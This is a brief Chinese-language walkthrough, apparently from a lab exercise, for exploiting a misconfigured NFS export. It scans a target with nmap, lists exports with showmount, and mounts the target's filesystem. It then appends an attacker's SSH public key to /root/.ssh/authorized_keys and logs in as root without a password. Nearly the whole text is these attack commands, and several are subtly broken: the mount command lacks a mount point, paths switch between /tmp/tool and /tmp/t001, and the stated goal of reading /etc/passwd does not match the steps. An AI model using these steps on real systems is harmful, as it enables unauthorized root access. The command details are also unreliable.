Nmap --- NFS共享目录配置漏洞

目的：利用nfs服务的共享目录配置漏洞，读取目标主机的/etc/passwd文件
原理：NFS服务配置漏洞，赋予了根目录远程可写权限，导致/root/ssh/authorized_keys可被修改，实现远程ssh无密码登录。
步骤：nmap -p0-65535 192.168.1.3 查看目标主机上nfs服务是否开启，
输入：showmount -e 192.168.1.3,查看指定的远程共享目录列表。
输入：ssh-keygen （一路回车）,生成sa公钥；
输入：mkdir /tmp/tool , 建立tool目录，
输入：mount -t nfs 192.168.1.3:/tmp/tool/ , 把.1.3的根目录挂载到tool目录下，
输入：cat /root/.ssh/id_rsa.pub >> /tmp/t001/root/.ssh/authorized_keys ， 把生成的公钥追加到靶机dauthorized_keys目录下，实现ssh免密码登录；
输入：ssh [email protected] , 登录进目标主机。